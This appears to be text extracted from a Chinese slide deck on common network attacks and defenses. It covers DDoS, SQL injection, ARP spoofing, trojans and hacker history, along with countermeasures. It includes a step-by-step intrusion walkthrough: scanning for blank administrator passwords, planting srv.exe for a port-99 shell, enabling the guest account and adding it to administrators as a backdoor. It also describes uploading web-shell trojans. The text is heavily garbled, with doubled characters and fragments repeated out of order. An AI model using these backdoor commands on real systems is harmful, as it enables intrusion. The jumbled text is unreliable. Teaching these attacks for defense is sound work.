1、网络攻击的常见手段与防范措施网络攻击的常见手段与防范措施网络攻击的常见手段与防范措施0102目录一、计算机网络安全的概念什什么么是是 网络安全网络安全是指网络系统的硬件、软件及其系统中的数据受到保护,不因偶然的或者恶意的原因而遭受到破坏、更改、泄露,系统连续可靠正常地运行,网络服务不中断。网网络络安安全全保密性信息不泄露给非授权用户、实体或过程,或供其利用的特性。完整性数据未经授权不能进行改变的特性。即信息在存储或传输过程中保持不被修改、不被破坏和丢失的特性。可用性可被授权实体访问并按需求使用的特性。即当需要时能否存取所需的信息。例如网络环境下拒绝服务、破坏网络和有关系统的正常运行等都属于对可
2、用性的攻击;可控性对信息的传播及内容具有控制能力。可审查性出现安全问题时提供依据与手段01入侵技术的历史和发展入侵技术的历史和发展02一般攻击步骤一般攻击步骤03攻击实例与攻击方式攻击实例与攻击方式目录二、常见的网络攻击黑客黑客是程序员,掌握操作系统和编程语言方面的知识,乐于探索黑客是程序员,掌握操作系统和编程语言方面的知识,乐于探索可编程系统的细节,并且不断提高自身能力,知道系统中的漏洞可编程系统的细节,并且不断提高自身能力,知道系统中的漏洞及其原因所在。专业黑客都是很有才华的源代码创作者。及其原因所在。专业黑客都是很有才华的源代码创作者。起源起源 20 20世纪世纪6060年代年代目的目的
3、 基于兴趣非法入侵基于兴趣非法入侵 基于利益非法入侵基于利益非法入侵 信息战信息战Kevin Mitnick凯文凯文米特尼克是世界上最著名的黑客之一,米特尼克是世界上最著名的黑客之一,第一个被美国联邦调查局通缉的黑客。第一个被美国联邦调查局通缉的黑客。19791979年,年,1515岁的米特尼克岁的米特尼克和他的朋友侵入了和他的朋友侵入了北美空中防务指挥系统北美空中防务指挥系统。打开安全防护软件的ARP防火墙功能。4月下旬,国内红(黑)客组织或个人,开始对美国网站进行小规模的攻击行动,4月26日有人发表了“五一卫国网战”战前声明,宣布将在5月1日至8日,对美国网站进行大规模的攻击行动。网络中充
4、斥着大量的无用的数据包;北京时间10月22日凌晨,美国域名服务器管理服务供应商Dyn宣布,该公司在当地时间周五早上遭遇了DDoS(分布式拒绝服务)攻击,从而导致许多网站在美国东海岸地区宕机,Twitter、Tumblr、Netflix、亚马逊、Shopify、Reddit、Airbnb、PayPal和Yelp等诸多人气网站无一幸免。利用探测出的管理员账号和密码登陆网站后台,在拥有附件上传的功能模块中尝试上传网页木马或一句话木马(一般利用数据库备份和恢复功能);社会工程学QQ数据库被盗因此,SQL注入只是网站入侵的前奏,就算注入成功也不一定可以拿到web shell或root。被攻击主机上有大量
5、等待的TCP连接;黑客是程序员,掌握操作系统和编程语言方面的知识,乐于探索可编程系统的细节,并且不断提高自身能力,知道系统中的漏洞及其原因所在。社会工程学QQ数据库被盗通过网页木马探测IIS服务器配置漏洞,找到突破点提升权限,上传文件木马并在远程服务器上运行;将用户登录名称、密码等数据加密保存。检查用户输入的合法性,确信输入的内容只包含合法的数据。,接着输入用户名与密码就进入对方了WuFtpd 格式字符串错误远程安全漏洞目的 基于兴趣非法入侵一、计算机网络安全的概念即当需要时能否存取所需的信息。莫里斯蠕虫(Morris WormMorris Worm)时间时间19881988年年 肇事者肇事者
6、罗伯特罗伯特塔潘塔潘莫里斯莫里斯,美国康奈尔大学学生,其父美国康奈尔大学学生,其父是美国国家安全局安全专家是美国国家安全局安全专家 机理机理利用利用sendmail,finger sendmail,finger 等服务的漏洞,消耗等服务的漏洞,消耗CPUCPU资源,资源,拒绝服务拒绝服务 影响影响InternetInternet上大约上大约60006000台计算机感染,占当时台计算机感染,占当时Internet Internet 联网主机总数的联网主机总数的10%10%,造成,造成96009600万美元的损失万美元的损失黑客从此真正变黑,黑客伦理失去约束,黑客传统开黑客从此真正变黑,黑客伦理失
7、去约束,黑客传统开始中断。始中断。2001年中美黑客大战 事件背景和经过 中美军机南海4.1撞机事件为导火线 4月初,以PoizonB0 x、pr0phet为代表的美国黑客组织对国内站点进行攻击,约300个左右的站点页面被修改 4月下旬,国内红(黑)客组织或个人,开始对美国网站进行小规模的攻击行动,4月26日有人发表了“五一卫国网战”战前声明,宣布将在5月1日至8日,对美国网站进行大规模的攻击行动。各方都得到第三方支援 各大媒体纷纷报道,评论,中旬结束大战中经网数据有限公司中经网数据有限公司中国科学院心理研究所中国科学院心理研究所国内某政府网站国内某政府网站国内某大型商业网站国内某大型商业网站
8、国内黑客组织更改的网站页面美国劳工部网站美国劳工部网站美国某节点网站美国某节点网站美国某大型商业网站美国某大型商业网站美国某政府网站美国某政府网站这次事件中采用的常用攻击手法 红客联盟负责人在5月9日网上记者新闻发布会上对此次攻击事件的技术背景说明如下“我们更多的是一种不满情绪的发泄,大家也可以看到被攻破的都是一些小站,大部分都是NT/Win2000系统,这个行动在技术上是没有任何炫耀和炒作的价值的。”主要采用当时流行的系统漏洞进行攻击这次事件中被利用的典型漏洞 用户名泄漏,缺省安装的系统用户名和密码 Unicode 编码可穿越firewall,执行黑客指令 ASP源代码泄露可远程连接的数据库
9、用户名和密码 SQL server缺省安装 微软Windows 2000登录验证机制可被绕过 Bind 远程溢出,Lion蠕虫 SUN rpc.sadmind 远程溢出,sadmin/IIS蠕虫 WuFtpd 格式字符串错误远程安全漏洞 拒绝服务(synflood,ping)1980198019851985199019901995199520002000密码猜测密码猜测可自动复制的代码可自动复制的代码密码破解密码破解利用已知的漏洞利用已知的漏洞破坏审计系统破坏审计系统后门后门会话劫持会话劫持擦除痕迹擦除痕迹嗅探嗅探包欺骗包欺骗GUIGUI远程控制远程控制自动探测扫描自动探测扫描拒绝服务拒绝服务
10、www www 攻击攻击工具工具攻击者攻击者入侵者水平入侵者水平攻击手法攻击手法半开放隐蔽扫描半开放隐蔽扫描控制台入侵控制台入侵检测网络管理检测网络管理DDOS DDOS 攻击攻击20022002高高入侵技术的发展检查用户输入的合法性,确信输入的内容只包含合法的数据。然而在2013年8月20日,中国雅虎邮箱宣布停止提供服务。利用探测出的管理员账号和密码登陆网站后台,在拥有附件上传的功能模块中尝试上传网页木马或一句话木马(一般利用数据库备份和恢复功能);exe吧(这里设置的时间要比主机时间推后)IP地址、主机是否运行、到要入侵点的路由、主机操作系统与用户信息等。Tracert/Tracerout
11、命令跟踪从一台计算机到另外一台计算机所走的路径此外,它还使得数据库权限可以限制到只允许特定的存储过程执行,所有的用户输入必须遵从被调用的存储过程的安全上下文,这样就很难再发生注入式攻击了。对信息的传播及内容具有控制能力。即当需要时能否存取所需的信息。种植木马隐蔽、免杀、网站挂马、邮件挂马彻底追踪查杀ARP病毒。这里会用到Telnet命令吧,注意端口是99。入侵检测系统就是城堡中的瞭望哨监视有无敌方或其他误入城堡的人出现。罗伯特塔潘莫里斯,美国康奈尔大学学生,其父是美国国家安全局安全专家这里会用到Telnet命令吧,注意端口是99。C:net user guest/active:yes 为了方便
12、日后登陆,将guest激活并加到管理组漏洞检测就是巡逻检查城堡是否坚固以及是否存在隐患。网页欺骗伪造网址、DNS重定向网关和终端双向绑定IP和MAC地址。获取网络服务的端口作为入侵通道。01入侵技术的历史和发展入侵技术的历史和发展02一般攻击步骤一般攻击步骤03攻击实例与攻击方式攻击实例与攻击方式目录 端口扫描网络攻击的前奏 网络监听局域网、HUB、ARP欺骗、网关设备 邮件攻击邮件炸弹、邮件欺骗 网页欺骗伪造网址、DNS重定向 密码破解字典破解、暴力破解、md5解密 漏洞攻击溢出攻击、系统漏洞利用 种植木马隐蔽、免杀、网站挂马、邮件挂马 DoS、DDoS拒绝服务攻击、分布式拒绝服务攻击 cc
13、攻击借助大量代理或肉鸡访问最耗资源的网页 XSS跨站攻击、SQL注入利用变量检查不严格构造javascript语句挂马或获取用户信息,或构造sql语句猜测表、字段以及管理员账号密码 社会工程学QQ数据库被盗端口端口判断判断判断判断系统系统选择选择最简最简方式方式入侵入侵分析分析可能可能有漏有漏洞的洞的服务服务获取获取系统系统一定一定权限权限提提升升为为最最高高权权限限安装安装多个多个系统系统后门后门清除清除入侵入侵脚印脚印攻击其攻击其他系统他系统获取敏获取敏感信息感信息作为其作为其他用途他用途常见的系统入侵步骤IP地址、主机是否运行、到要入侵点的路由、主机操作系统与用户信息等。Ping命令判断
14、计算机是否开着,或者数据包发送到返回需要多少时间 Tracert/Tracerout命令跟踪从一台计算机到另外一台计算机所走的路径 Finger和Rusers命令收集用户信息 Host或者Nslookup命令,结合Whois和Finger命令获取主机、操作系统和用户等信息 应用的方法:应用的方法:获取网络服务的端口作为入侵通道。1.TCP Connect()2.TCP SYN3.TCP FIN4.IP段扫瞄5.TCP反向Ident扫瞄6.FTP代理扫瞄7.UDP ICMP不到达扫瞄7 7种扫瞄类型:种扫瞄类型:用“流光”扫的用户名是administrator,密码为“空”的IP地址 先复制sr
15、v.exe上去,在流光的Tools目录下 查查时间,发现的当前时间是 2003/3/19 上午 11:00,命令成功完成。用at命令启动srv.exe吧(这里设置的时间要比主机时间推后)再查查时间到了没有,如果的当前时间是 2003/3/19 上午 11:05,那就准备开始下面的命令。这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了 也在流光的Tools目录中 8.
16、C:WINNTsystem32ntlm 输入ntlm启动(这里的C:WINNTsystem32是在对方计算机上运行当出现“DONE”的时候,就说明已经启动正常。然后使用“net start telnet”来开启Telnet服务),接着输入用户名与密码就进入对方了 10.C:net user guest/active:yes 为了方便日后登陆,将guest激活并加到管理组 11.C:net user guest 1234 将Guest的密码改为1234 12.C:net localgroup administrators guest/add 将Guest变为Administrator01入侵技术
17、的历史和发展入侵技术的历史和发展02一般攻击步骤一般攻击步骤03攻击实例与攻击方式攻击实例与攻击方式目录北京时间10月22日凌晨,美国域名服务器管理服务供应商Dyn宣布,该公司在当地时间周五早上遭遇了DDoS(分布式拒绝服务)攻击,从而导致许多网站在美国东海岸地区宕机,Twitter、Tumblr、Netflix、亚马逊、Shopify、Reddit、Airbnb、PayPal和Yelp等诸多人气网站无一幸免。Dyn称,攻击由感染恶意代码的设备发起,来自全球上千万IP地址,几百万恶意攻击的源头是物联网联系的所谓“智能”家居产品。1、DDoS(分布式拒绝服务)攻击攻击现象 被攻击主机上有大量等待
18、的TCP连接;网络中充斥着大量的无用的数据包;源地址为假 制造高流量无用数据,造成网络拥塞,使受害主机无法正常和外界通讯;利用受害主机提供的传输协议上的缺陷反复高速的发出特定的服务请求,使主机无法处理所有正常请求;严重时会造成系统死机。:借助于C/S(客户/服务器)技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DDoS攻击,从而成倍地提高拒绝服务攻击的威力攻击流程 1、搜集资料,被攻击目标主机数目、地址情况,目标主机的配置、性能,目标的宽带。2、是占领和控制网络状态好、性能好、安全管理水平差的主机做傀儡机。3、攻击者在客户端通过telnet之类的常用连接软件,向主控端发送发送对目
19、标主机的攻击请求命令。主控端侦听接收攻击命令,并把攻击命令传到分布端,分布端是执行攻击的角色,收到命令立即发起flood攻击。主机设置所有的主机平台都有抵御DoS的设置,基本的有:1、关闭不必要的服务2、限制同时打开的Syn半连接数目3、缩短Syn半连接的time out 时间4、及时更新系统补丁网络设置1.防火墙禁止对主机的非开放服务的访问 限制同时打开的SYN最大连接数 限制特定IP地址的访问 启用防火墙的防DDoS的属性 严格限制对外开放的服务器的向外访问 第五项主要是防止自己的服务器被当做工具去害人。2.路由器设置SYN数据包流量速率 升级版本过低的ISO 为路由器建立log serv
20、er防范措施邮件攻击邮件炸弹、邮件欺骗这里会用到Telnet命令吧,注意端口是99。如果将我们内部网络比作城堡C:net user guest 1234 将Guest的密码改为1234通过网页木马探测IIS服务器配置漏洞,找到突破点提升权限,上传文件木马并在远程服务器上运行;社会工程学QQ数据库被盗虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!种植木马隐蔽、免杀、网站挂马、邮件挂马对信息的传播及内容具有控制能力。Bind 远程溢出,Lion蠕虫网关和终端双向绑定IP和MAC地址。用“流光”扫的用户名是administrator,密码为“空”的IP地址所以我们打算建立
21、一个Telnet服务!漏洞检测就是巡逻检查城堡是否坚固以及是否存在隐患。例如网络环境下拒绝服务、破坏网络和有关系统的正常运行等都属于对可用性的攻击;入侵检测系统就是城堡中的瞭望哨监视有无敌方或其他误入城堡的人出现。利用探测出的管理员账号和密码登陆网站后台,在拥有附件上传的功能模块中尝试上传网页木马或一句话木马(一般利用数据库备份和恢复功能);罗伯特塔潘莫里斯,美国康奈尔大学学生,其父是美国国家安全局安全专家源地址为假 制造高流量无用数据,造成网络拥塞,使受害主机无法正常和外界通讯;防范SQL注入,还要避免出现一些详细的错误消息,因为黑客们可以利用这些消息。SQL参数的传递方式将防止攻击者利用单
22、引号和连字符实施攻击。雅虎作为美国著名的互联网门户网站,也是20世纪末互联网奇迹的创造者之一。然而在2013年8月20日,中国雅虎邮箱宣布停止提供服务。就在大家已快将其淡忘的时候,雅虎公司突然对外发布消息,承认在2014年的一次黑客袭击中,至少5亿用户的数据信息遭窃。此次事件成为了有史以来规模最大的单一网站信息泄露事件。2、:就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站
23、上的数据库,而不是按照设计者意图去执行SQL语句。利用探测出的管理员账号和密码登陆网站后台,在拥有附件上传的功能模块中尝试上传网页木马或一句话木马(一般利用数据库备份和恢复功能);通过网页木马探测IIS服务器配置漏洞,找到突破点提升权限,上传文件木马并在远程服务器上运行;通过连接木马彻底拿到系统控制权;因此,SQL注入只是网站入侵的前奏,就算注入成功也不一定可以拿到web shell或root。1 1、输入验证、输入验证检查用户输入的合法性,确信输入的内容只包含合法的数据。2 2、错误消息处理、错误消息处理防范SQL注入,还要避免出现一些详细的错误消息,因为黑客们可以利用这些消息。要使用一种标
24、准的输入确认机制来验证所有的输入数据的长度、类型、语句、企业规则等。3 3、加密处理、加密处理将用户登录名称、密码等数据加密保存。4 4、存储过程来执行所有的查询、存储过程来执行所有的查询SQL参数的传递方式将防止攻击者利用单引号和连字符实施攻击。此外,它还使得数据库权限可以限制到只允许特定的存储过程执行,所有的用户输入必须遵从被调用的存储过程的安全上下文,这样就很难再发生注入式攻击了。5 5、使用专业的漏洞扫描工具、使用专业的漏洞扫描工具6 6、确保数据库安全、确保数据库安全7 7、安全审评、安全审评防范措施3、ARP(Address Resolution Protocol,地址解析协议)是
25、根据IP地址获取物理地址的一个TCP/IP协议。ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IPMAC条目,造成网络中断或中间人攻击。ARP攻击仅能在局域网内进行。ARP请求包是以广播的形式发出,正常情况下只有正确IP地址的主机才会发出ARP响应包,告知查询主机自己的MAC地址。局域网中每台主机都维护着一张ARP表,其中存放着地址对。ARP改向的中间人窃听A发往B:(MACb,MACa,PROTOCOL,DATA)B发往A:(MACa,MACb,PROTOCOL,
26、DATA)A发往B:(MACx,MACa,PROTOCOL,DATA)B发往A:(MACx,MACb,PROTOCOL,DATA)原理X分别向A和B发送ARP包,促使其修改ARP表主机A的ARP表中B为主机B的ARP表中A为X成为主机A和主机B之间的“中间人”,可以选择被动地监测流量,获取密码和其他涉密信息,也可以伪造数据,改变电脑A和电脑B之间的通信内容。防范措施:网关和终端双向绑定IP和MAC地址。局域网中的每台电脑中进行静态ARP绑定。打开安全防护软件的ARP防火墙功能。彻底追踪查杀ARP病毒。01常见的安全防范措施常见的安全防范措施目录三、安全防范措施 物理层 网络层路由交换策略VLA
27、N划分防火墙、隔离网闸入侵检测抗拒绝服务传输加密系统层漏洞扫描系统安全加固SUS补丁安全管理应用层防病毒安全功能增强管理层独立的管理队伍统一的管理策略如果将我们内部网络比作城堡 防火墙就是城堡的城门或护城河只允许己方的队伍通过。防病毒产品就是城堡中的将士想法设法把发现的敌人消灭。入侵检测系统就是城堡中的瞭望哨监视有无敌方或其他误入城堡的人出现。漏洞检测就是巡逻检查城堡是否坚固以及是否存在隐患。VPN就是城堡的安全密道当城堡周围遍布敌军时可做内外联络。访问访问控制控制 认证认证 NAT 加密加密 防病毒、内容防病毒、内容过滤过滤 流量管理流量管理SQL参数的传递方式将防止攻击者利用单引号和连字符
28、实施攻击。获取网络服务的端口作为入侵通道。此次事件成为了有史以来规模最大的单一网站信息泄露事件。Dyn称,攻击由感染恶意代码的设备发起,来自全球上千万IP地址,几百万恶意攻击的源头是物联网联系的所谓“智能”家居产品。C:net user guest/active:yes 为了方便日后登陆,将guest激活并加到管理组各大媒体纷纷报道,评论,中旬结束大战C:net user guest/active:yes 为了方便日后登陆,将guest激活并加到管理组入侵检测系统就是城堡中的瞭望哨监视有无敌方或其他误入城堡的人出现。目的 基于兴趣非法入侵被攻击主机上有大量等待的TCP连接;通过网页木马探测II
29、S服务器配置漏洞,找到突破点提升权限,上传文件木马并在远程服务器上运行;A发往B:(MACx,MACa,PROTOCOL,DATA)利用探测出的管理员账号和密码登陆网站后台,在拥有附件上传的功能模块中尝试上传网页木马或一句话木马(一般利用数据库备份和恢复功能);这次事件中采用的常用攻击手法即信息在存储或传输过程中保持不被修改、不被破坏和丢失的特性。密码破解字典破解、暴力破解、md5解密B发往A:(MACx,MACb,PROTOCOL,DATA)利用探测出的管理员账号和密码登陆网站后台,在拥有附件上传的功能模块中尝试上传网页木马或一句话木马(一般利用数据库备份和恢复功能);Firewall FirewallServersDMZDMZIDS AgentIntranetIntranet监控中心监控中心router攻击者攻击者发现攻击发现攻击发现攻击发现攻击发现攻击发现攻击报警报警报警报警IDS Agent地方网管地方网管scanner监控中心监控中心地方网管地方网管地方网管地方网管地方网管地方网管地方网管地方网管市场部市场部工程部工程部routerouter r开发部开发部ServersServersFirewallFirewall